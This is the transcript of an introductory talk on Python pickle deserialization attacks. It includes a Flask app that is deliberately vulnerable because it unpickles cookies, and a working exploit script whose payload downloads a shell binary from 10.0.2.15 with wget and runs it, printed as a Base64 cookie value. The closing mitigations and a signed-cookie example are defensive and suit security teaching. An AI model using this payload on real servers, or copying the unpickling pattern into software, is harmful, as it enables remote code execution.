
Introduction to Deserialization Attacks

Ayush Priya
November 16, 2021

This talk provides an introduction to identifying and exploiting Deserialization Attacks with a sample scenario created with Python.

Transcript

  1. What is serialization?
     • Converting objects to storable data
     • Also known as marshalling
     • Deserialization - retrieving objects from serial data
  2. import pickle
     import os

     class BadUserClass():
         def __init__(self, username):
             self.username = username

         def __reduce__(self):
             # os.system("whoami") is evaluated as soon as __reduce__ is called
             # (during pickle.dumps); its exit status, 0, becomes the constructor argument.
             return (self.__class__, (os.system("whoami"),))

     bad_user_obj = BadUserClass("ayush")
     serialized_obj = pickle.dumps(bad_user_obj)

     # Insecure deserialization
     user = pickle.loads(serialized_obj)
     print("Hello!, {}".format(user.username))

     # Output:
     # desktop-fsv539h\ayush
     # Hello!, 0
  3. # flask_app.py
     import os
     import pickle
     from uuid import uuid1
     from flask import Flask, make_response, request
     from base64 import b64encode, b64decode

     # The User Class which assigns a random ID to each connection
     class UserID:
         def __init__(self, uuid=None):
             self.uuid = str(uuid1())

         def __str__(self):
             return self.uuid

     # The main Flask Backend
     app = Flask(__name__)

     @app.route('/', methods=['GET'])
     def index():
         obj = request.cookies.get('uuid')
         if obj is None:
             msg = "Seems like you didn't have a cookie. No worries! I'll set one now!"
             response = make_response(msg)
             obj = UserID()
             # Cookie values must be text, so decode the Base64 bytes
             response.set_cookie('uuid', b64encode(pickle.dumps(obj)).decode())
             return response
         else:
             # Insecure: unpickles a cookie value that the client controls
             return "Hey there! {}!".format(pickle.loads(b64decode(obj)))

     if __name__ == "__main__":
         app.run(host='0.0.0.0')
  4. What do we need to do?
     • Create a payload
     • Serialize it, get Base64 value
     • Modify cookie’s value
  5. # exploit.py
     import os
     import pickle
     from base64 import b64encode

     PAYLOAD = "cd /tmp && wget http://10.0.2.15/shell.elf && chmod +x shell.elf && ./shell.elf"

     class Exploit(object):
         def __reduce__(self):
             return (eval, ("os.system('" + PAYLOAD + "')",))

     exploit_code = pickle.dumps(Exploit())
     print(b64encode(exploit_code))

     # Output is:
     # b'gANjYnVpbHRpbnMKZXZhbApxAFhcAAAAb3Muc3lzdGVtKCdjZCAvdG1wICYmIHdnZXQgaHR0cDovLzEwLjAuMi4xNS9zaGVsbC5lbGYgJiYgY2htb2QgK3ggc2hlbGwuZWxmICYmIC4vc2hlbGwuZWxmJylxAYVxAlJxAy4='
  6. Mitigation
     • Don’t deserialize data from untrusted sources
     • Limited access privileges
     • Safe deserialization methods
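
One way to apply the first and third mitigations to the cookie from flask_app.py, as an added example that is not part of the original deck: the cookie carries the UUID as plain text plus an HMAC tag, so the server verifies and validates it instead of unpickling it. The names `SECRET_KEY`, `issue_cookie` and `read_cookie` are hypothetical, and the key handling is an assumption.

```python
import hashlib
import hmac
import secrets
import uuid
from base64 import urlsafe_b64decode, urlsafe_b64encode
from typing import Optional

# Assumption: a real deployment loads this key from server-side secret storage.
SECRET_KEY = secrets.token_bytes(32)


def _tag(value: bytes) -> bytes:
    """HMAC-SHA256 over the cookie value, keyed with the server secret."""
    return hmac.new(SECRET_KEY, value, hashlib.sha256).digest()


def issue_cookie() -> str:
    """Return '<uuid>.<base64 tag>'; plain text is sent, no object is pickled."""
    value = str(uuid.uuid1())
    return value + "." + urlsafe_b64encode(_tag(value.encode())).decode()


def read_cookie(cookie: str) -> Optional[str]:
    """Return the user ID if the cookie is authentic and well-formed, else None."""
    value, sep, tag_b64 = cookie.rpartition(".")
    if not sep:
        return None  # no tag at all, e.g. a bare Base64 pickle blob
    try:
        tag = urlsafe_b64decode(tag_b64.encode())
    except ValueError:  # binascii.Error (bad padding) is a ValueError
        return None
    # Constant-time comparison; reject before interpreting the value.
    if not hmac.compare_digest(tag, _tag(value.encode())):
        return None
    try:
        return str(uuid.UUID(value))  # only a canonical UUID is accepted
    except ValueError:
        return None


if __name__ == "__main__":
    cookie = issue_cookie()
    print("issued :", cookie)
    print("valid  :", read_cookie(cookie))
    # Constructed forgery: a different UUID reusing the old tag is rejected.
    print("forged :", read_cookie(str(uuid.uuid4()) + "." + cookie.split(".")[1]))
```

In the Flask handler, `issue_cookie()` would replace `b64encode(pickle.dumps(obj))` and `read_cookie()` would replace `pickle.loads(b64decode(obj))`, with a `None` result treated as a missing cookie.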